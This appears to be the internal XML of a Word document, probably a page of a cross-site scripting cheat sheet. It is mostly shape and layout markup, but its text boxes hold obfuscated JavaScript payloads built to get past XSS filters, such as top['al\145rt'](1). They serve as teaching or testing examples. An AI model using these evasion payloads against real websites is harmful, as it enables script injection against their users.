                <wp:docPr id="2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1965" cy="116205"/>
                          <a:chOff x="1930" y="1627"/>
                          <a:chExt cx="2759" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="28" name="Freeform 30"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1627"/>
                            <a:ext cx="2759" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4667 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 2759"/>
                              <a:gd name="T2" fmla="+- 0 1810 1627"/>
                              <a:gd name="T3" fmla="*/ 1810 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 2759"/>
                              <a:gd name="T6" fmla="+- 0 1810 1627"/>
                              <a:gd name="T7" fmla="*/ 1810 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 2759"/>
                              <a:gd name="T10" fmla="+- 0 1809 1627"/>
                              <a:gd name="T11" fmla="*/ 1809 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 2759"/>
                              <a:gd name="T14" fmla="+- 0 1788 1627"/>
                              <a:gd name="T15" fmla="*/ 1788 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 2759"/>
                              <a:gd name="T18" fmla="+- 0 1785 1627"/>
                              <a:gd name="T19" fmla="*/ 1785 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 2759"/>
                              <a:gd name="T22" fmla="+- 0 1648 1627"/>
                              <a:gd name="T23" fmla="*/ 1648 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 2759"/>
                              <a:gd name="T26" fmla="+- 0 1627 1627"/>
                              <a:gd name="T27" fmla="*/ 1627 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4667 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 2759"/>
                              <a:gd name="T30" fmla="+- 0 1627 1627"/>
                              <a:gd name="T31" fmla="*/ 1627 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4688 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 2759"/>
                              <a:gd name="T34" fmla="+- 0 1648 1627"/>
                              <a:gd name="T35" fmla="*/ 1648 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4688 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 2759"/>
                              <a:gd name="T38" fmla="+- 0 1788 1627"/>
                              <a:gd name="T39" fmla="*/ 1788 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4670 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 2759"/>
                              <a:gd name="T42" fmla="+- 0 1809 1627"/>
                              <a:gd name="T43" fmla="*/ 1809 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4667 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 2759"/>
                              <a:gd name="T46" fmla="+- 0 1810 1627"/>
                              <a:gd name="T47" fmla="*/ 181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759" h="183">
                                <a:moveTo>
                                  <a:pt x="2737" y="183"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="183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737" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2758" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2758" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2740" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2737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27"/>
                            <a:ext cx="275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top[/al/.source+/ert/.source](1)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" o:spid="_x0000_s2286" style="position:absolute;margin-left:96.5pt;margin-top:81.35pt;width:137.95pt;height:9.15pt;z-index:-15452160;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1627" coordsize="2759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">
                <v:shape id="Freeform 30" o:spid="_x0000_s2287" style="position:absolute;left:1930;top:1627;width:2759;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="275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E2rL8A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuII7TRUcpBrFKgMjDPj8gEtz2xSb&#10;m9LEWv/eLAZmeTjv9ba3teio9ZVjBbNpAoI4d7riUsH99j1ZgvABWWPtmBS8ycN2MxysMdXuxRfq&#10;rqEUMYR9igpMCE0qpc8NWfRT1xBHrnCtxRBhW0rd4iuG21rOk+RLWqw4NhhsaG8of1yfVsExq06H&#10;7H5qnu/EZPp3UZy7W6HUeNTvViAC9eFf/Of+0QrmcWz8En+A3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MTasvwAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m2737,183l21,183r-3,-1l,161r,-3l,21,21,,2737,r21,21l2758,161r-18,21l2737,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2737,1810;21,1810;18,1809;0,1788;0,1785;0,1648;21,1627;2737,1627;2758,1648;2758,1788;2740,1809;2737,1810" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 29" o:spid="_x0000_s2288" type="#_x0000_t202" style="position:absolute;left:1930;top:1627;width:2759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/Bl8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sEihd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8GXxQAAANs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top[/al/.source+/ert/.source](1)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64832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1303655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="26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101 2053"/>
                            <a:gd name="T3" fmla="*/ 2101 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2101 2053"/>
                            <a:gd name="T7" fmla="*/ 2101 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2100 2053"/>
                            <a:gd name="T11" fmla="*/ 2100 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2080 2053"/>
                            <a:gd name="T15" fmla="*/ 2080 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2074 2053"/>
                            <a:gd name="T19" fmla="*/ 2074 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2053 2053"/>
                            <a:gd name="T23" fmla="*/ 2053 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2053 2053"/>
                            <a:gd name="T27" fmla="*/ 2053 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2077 2053"/>
                            <a:gd name="T31" fmla="*/ 2077 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2080 2053"/>
                            <a:gd name="T35" fmla="*/ 2080 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2101 2053"/>
                            <a:gd name="T39" fmla="*/ 210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7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7F1C3" id="Freeform 27" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:102.65pt;width:2.45pt;height:2.45pt;z-index:-15451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" path="m28,48r-7,l18,47,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1334135;13335,1334135;11430,1333500;0,1320800;0,1316990;13335,1303655;17780,1303655;31115,1318895;31115,1320800;17780,133413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65344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1257300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2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6205"/>
                          <a:chOff x="1930" y="1980"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="24" name="Freeform 26"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1979"/>
                            <a:ext cx="1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 2162 1980"/>
                              <a:gd name="T3" fmla="*/ 2162 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 2162 1980"/>
                              <a:gd name="T7" fmla="*/ 2162 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 2161 1980"/>
                              <a:gd name="T11" fmla="*/ 2161 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 2141 1980"/>
                              <a:gd name="T15" fmla="*/ 2141 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 2138 1980"/>
                              <a:gd name="T19" fmla="*/ 2138 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 2001 1980"/>
                              <a:gd name="T23" fmla="*/ 2001 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 1980 1980"/>
                              <a:gd name="T27" fmla="*/ 1980 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 1980 1980"/>
                              <a:gd name="T31" fmla="*/ 1980 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 2001 1980"/>
                              <a:gd name="T35" fmla="*/ 2001 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 2141 1980"/>
                              <a:gd name="T39" fmla="*/ 2141 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 2161 1980"/>
                              <a:gd name="T43" fmla="*/ 2161 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 2162 1980"/>
                              <a:gd name="T47" fmla="*/ 216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67" h="183">
                                <a:moveTo>
                                  <a:pt x="1146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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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979"/>
                            <a:ext cx="11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al\u0065rt(1)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2289" style="position:absolute;margin-left:96.5pt;margin-top:99pt;width:58.35pt;height:9.15pt;z-index:-15451136;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1980" coordsize="116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">
                <v:shape id="Freeform 26" o:spid="_x0000_s2290" style="position:absolute;left:1930;top:1979;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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eshMMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE74V9h3AEb2RNV2RZukZxhYWCeOHPAxya&#10;s22xOSlJ2sa3N4Kwl8PMfMOst9G0YiDnG8sKPhYZCOLS6oYrBdfL7/sXCB+QNbaWScGdPGw3b5M1&#10;5tqOfKLhHCqRIOxzVFCH0OVS+rImg35hO+Lk/VlnMCTpKqkdjgluWrnMsk9psOG0UGNH+5rK27k3&#10;Co77n1jgYXQ+FkO/6ufXk7zflJpN4+4bRKAY/sOvdqEVLFfw/JJ+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eshMMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1146,182l21,182r-3,-1l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,20l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,2162;21,2162;18,2161;0,2141;0,2138;0,2001;21,1980;1146,1980;1167,2001;1167,2141;1149,2161;1146,2162" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 25" o:spid="_x0000_s2291" type="#_x0000_t202" style="position:absolute;left:1930;top:1979;width:116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LLksMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3nSjo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LLksMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA=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al\u0065rt(1)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65856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1519555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="22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441 2393"/>
                            <a:gd name="T3" fmla="*/ 2441 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2441 2393"/>
                            <a:gd name="T7" fmla="*/ 2441 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2441 2393"/>
                            <a:gd name="T11" fmla="*/ 2441 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2420 2393"/>
                            <a:gd name="T15" fmla="*/ 2420 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2414 2393"/>
                            <a:gd name="T19" fmla="*/ 2414 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2393 2393"/>
                            <a:gd name="T23" fmla="*/ 2393 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2393 2393"/>
                            <a:gd name="T27" fmla="*/ 2393 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2417 2393"/>
                            <a:gd name="T31" fmla="*/ 2417 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2420 2393"/>
                            <a:gd name="T35" fmla="*/ 2420 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2441 2393"/>
                            <a:gd name="T39" fmla="*/ 2441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0C7F8" id="Freeform 23" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:119.65pt;width:2.45pt;height:2.45pt;z-index:-15450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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1550035;13335,1550035;11430,1550035;0,1536700;0,1532890;13335,1519555;17780,1519555;31115,1534795;31115,1536700;17780,155003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6636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1473200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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3300" cy="116205"/>
                          <a:chOff x="1930" y="2320"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="20" name="Freeform 22"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2319"/>
                            <a:ext cx="1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 2502 2320"/>
                              <a:gd name="T3" fmla="*/ 2502 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 2502 2320"/>
                              <a:gd name="T7" fmla="*/ 2502 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 2501 2320"/>
                              <a:gd name="T11" fmla="*/ 2501 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 2481 2320"/>
                              <a:gd name="T15" fmla="*/ 2481 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 2478 2320"/>
                              <a:gd name="T19" fmla="*/ 2478 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 2341 2320"/>
                              <a:gd name="T23" fmla="*/ 2341 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 2320 2320"/>
                              <a:gd name="T27" fmla="*/ 2320 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 2320 2320"/>
                              <a:gd name="T31" fmla="*/ 2320 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 2341 2320"/>
                              <a:gd name="T35" fmla="*/ 2341 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 2481 2320"/>
                              <a:gd name="T39" fmla="*/ 2481 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 2501 2320"/>
                              <a:gd name="T43" fmla="*/ 2501 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580"/>
                              <a:gd name="T46" fmla="+- 0 2502 2320"/>
                              <a:gd name="T47" fmla="*/ 250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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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2319"/>
                            <a:ext cx="158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 w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>top[‘al\145rt’](1)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2292" style="position:absolute;margin-left:96.5pt;margin-top:116pt;width:79pt;height:9.15pt;z-index:-15450112;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2320" coordsize="158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">
                <v:shape id="Freeform 22" o:spid="_x0000_s2293" style="position:absolute;left:1930;top:2319;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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0V674A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0RikRXKZWCN1HjfcxOk9Ds&#10;bNydxvTfu4eCx8f7Xm9H16mBQmw9G5jPMlDElbct1wbK89fbElQUZIudZzLwRxG2m8nLGgvr73yk&#10;4SS1SiEcCzTQiPSF1rFqyGGc+Z44cd8+OJQEQ61twHsKd53Os+xdO2w5NTTY02dD1c/p1xkIufjr&#10;oj/IAS/tbtDl7VyVN2Nep+PHCpTQKE/xv3tvDeRpffqSfoDeP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aNFeu+AAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" path="m1559,182l21,182r-3,-1l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,20l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,2502;21,2502;18,2501;0,2481;0,2478;0,2341;21,2320;1559,2320;1580,2341;1580,2481;1562,2501;1559,2502" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 21" o:spid="_x0000_s2294" type="#_x0000_t202" style="position:absolute;left:1930;top:2319;width:158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 w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>top[‘al\145rt’](1)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66880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1743075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="18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794 2745"/>
                            <a:gd name="T3" fmla="*/ 2794 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 2794 2745"/>
                            <a:gd name="T7" fmla="*/ 2794 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 2793 2745"/>
                            <a:gd name="T11" fmla="*/ 2793 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 2773 2745"/>
                            <a:gd name="T15" fmla="*/ 2773 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 2766 2745"/>
                            <a:gd name="T19" fmla="*/ 2766 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2745 2745"/>
                            <a:gd name="T23" fmla="*/ 2745 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2745 2745"/>
                            <a:gd name="T27" fmla="*/ 2745 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2769 2745"/>
                            <a:gd name="T31" fmla="*/ 2769 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2773 2745"/>
                            <a:gd name="T35" fmla="*/ 2773 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2794 2745"/>
                            <a:gd name="T39" fmla="*/ 2794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C0E69" id="Freeform 19" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:137.25pt;width:2.45pt;height:2.45pt;z-index:-15449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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1774190;13335,1774190;11430,1773555;0,1760855;0,1756410;13335,1743075;17780,1743075;31115,1758315;31115,1760855;17780,177419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6739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1696720</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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3300" cy="116205"/>
                          <a:chOff x="1930" y="2672"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="Freeform 18"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2672"/>
                            <a:ext cx="1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 2854 2672"/>
                              <a:gd name="T3" fmla="*/ 2854 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 2854 2672"/>
                              <a:gd name="T7" fmla="*/ 2854 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 2854 2672"/>
                              <a:gd name="T11" fmla="*/ 2854 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 2833 2672"/>
                              <a:gd name="T15" fmla="*/ 2833 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 2830 2672"/>
                              <a:gd name="T19" fmla="*/ 2830 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 2693 2672"/>
                              <a:gd name="T23" fmla="*/ 2693 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 2672 2672"/>
                              <a:gd name="T27" fmla="*/ 2672 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 2672 2672"/>
                              <a:gd name="T31" fmla="*/ 2672 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
